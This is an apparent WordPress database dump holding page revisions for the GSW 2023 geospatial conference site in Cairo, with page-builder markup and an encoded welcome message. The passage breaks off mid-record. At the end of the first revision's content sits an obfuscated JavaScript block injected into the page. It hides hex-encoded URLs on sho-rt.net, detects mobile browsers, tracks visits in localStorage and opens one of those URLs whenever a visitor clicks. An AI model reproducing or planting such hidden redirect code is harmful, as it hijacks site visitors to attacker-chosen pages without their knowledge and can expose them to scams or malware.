icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:%2Fsoftware-company%2Fshowcase%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665117715892{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:%2Fsoftware-company%2Fcontact%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665119554164{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #FFFFFF), color-stop(54%, #FFFFFF), color-stop(81%, #FFFFFF), color-stop(95%, #FFFFFF));background: -moz-linear-gradient(left,#FFFFFF 10%,#FFFFFF 54%,#FFFFFF 81%,#FFFFFF 95%);background: -webkit-linear-gradient(left,#FFFFFF 10%,#FFFFFF 54%,#FFFFFF 81%,#FFFFFF 95%);background: -o-linear-gradient(left,#FFFFFF 10%,#FFFFFF 54%,#FFFFFF 81%,#FFFFFF 95%);background: -ms-linear-gradient(left,#FFFFFF 10%,#FFFFFF 54%,#FFFFFF 81%,#FFFFFF 95%);background: linear-gradient(left,#FFFFFF 10%,#FFFFFF 54%,#FFFFFF 81%,#FFFFFF 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023 By\" main_heading_color=\"#0367bf\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" margin_design_tab_text=\"\"][/ultimate_heading][vc_masonry_media_grid element_width=\"6\" gap=\"20\" item=\"masonryGrid_IconSlideOut\" initial_loading_animation=\"fadeIn\" grid_id=\"vc_gid:1665119259246-2c5e5f13-c051-1\" include=\"2325,2326\" css=\".vc_custom_1665119991876{background-color: #ffffff !important;}\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-06 20:23:53','2022-10-06 20:23:53','',2167,'https://gsw2023.com/?p=2330',0,'revision','',0),
(2331,1,'2022-10-06 20:26:42','2022-10-06 20:26:42','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_row_inner css=\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\"][vc_column_inner width=\"5/12\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTI